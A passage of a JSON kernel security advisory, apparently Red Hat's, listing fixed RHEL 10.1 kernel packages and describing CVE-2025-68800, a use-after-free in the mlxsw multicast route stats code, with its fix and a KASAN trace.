"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: smc: Use __sk_dst_get() and dst_dev_rcu() in smc_clc_prfx_match()"
},
{
"cve": "CVE-2025-68800",
"cwe": {
"id": "CWE-825",
"name": "Expired Pointer Dereference"
},
"discovery_date": "2026-01-13T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2429065"
}
],
"notes": [
{
"category": "description",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats\n\nCited commit added a dedicated mutex (instead of RTNL) to protect the\nmulticast route list, so that it will not change while the driver\nperiodically traverses it in order to update the kernel about multicast\nroute stats that were queried from the device.\n\nOne instance of list entry deletion (during route replace) was missed\nand it can result in a use-after-free [1].\n\nFix by acquiring the mutex before deleting the entry from the list and\nreleasing it afterwards.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\nRead of size 8 at addr ffff8881523c2fa8 by task kworker/2:5/22043\n\nCPU: 2 UID: 0 PID: 22043 Comm: kworker/2:5 Not tainted 6.18.0-rc1-custom-g1a3d6d7cd014 #1 PREEMPT(full)\nHardware name: Mellanox Technologies Ltd. MSN2010/SA002610, BIOS 5.6.5 08/24/2017\nWorkqueue: mlxsw_core mlxsw_sp_mr_stats_update [mlxsw_spectrum]\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xba/0x110\n print_report+0x174/0x4f5\n kasan_report+0xdf/0x110\n mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\nAllocated by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x8f/0xa0\n mlxsw_sp_mr_route_add+0xd8/0x4770 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n\nFreed by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x70\n __kasan_slab_free+0x43/0x70\n kfree+0x14e/0x700\n mlxsw_sp_mr_route_add+0x2dea/0x4770 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:444 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A use-after-free exists in mlxsw_spectrum multicast routing when a route entry is deleted from the multicast route list without holding route_list_lock, while the periodic stats worker traverses the same list. A privileged attacker who can manipulate multicast routes on a host using mlxsw Spectrum hardware can trigger the race to crash the kernel and potentially corrupt memory.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
